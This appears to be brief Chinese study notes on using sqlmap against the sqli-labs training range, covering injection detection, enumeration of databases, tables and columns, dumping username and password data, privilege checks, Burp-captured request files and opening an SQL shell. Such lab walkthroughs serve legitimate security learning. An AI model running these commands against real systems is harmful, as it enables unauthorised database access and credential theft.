sqlmap使用
试验靶场,sqli-labs第一关
sqlmap -u http://**** -p id
sqlmap -u http://***** --dbs --dbms mysql
查询数据库,–dbms是指定数据库类型,不加也可以。
sqlmap -u *** -D security --tables
查询表名
sqlmap -u *** -D security -T users --columns
列名
这里是引用
sqlmap -u *** -D security -T users -C “username,password” --dump
dump就是列出指定数据库的表的列的数据,还可写成
–dump -T""-D""-C""
--current-user 当前用户
--current-db当前数据库
--users当前数据库里所有的用户
--privileges查看用户权限
-U root --privileges 查看只和root相关的权限
通用技巧:
试验靶场 sqli第十一关
- burpsuite抓包
copy下抓下来的数据,新建一个文档,放在主文件夹下,假设命名为aaa - sqlmap -r aaa
uname是可以被注入的 - sqlmap -r aaa --dbs 数据库名称
- sqlmap -r aaa -D security -tables
- 后面都是一样的。只是将信息都封进了aaa文件中。
交互成功的话,还可以拿sqlshell - sqlmap -r aaa --sql-shell
然后就可以执行sql语句查询数据表了
- quit退出sqlshell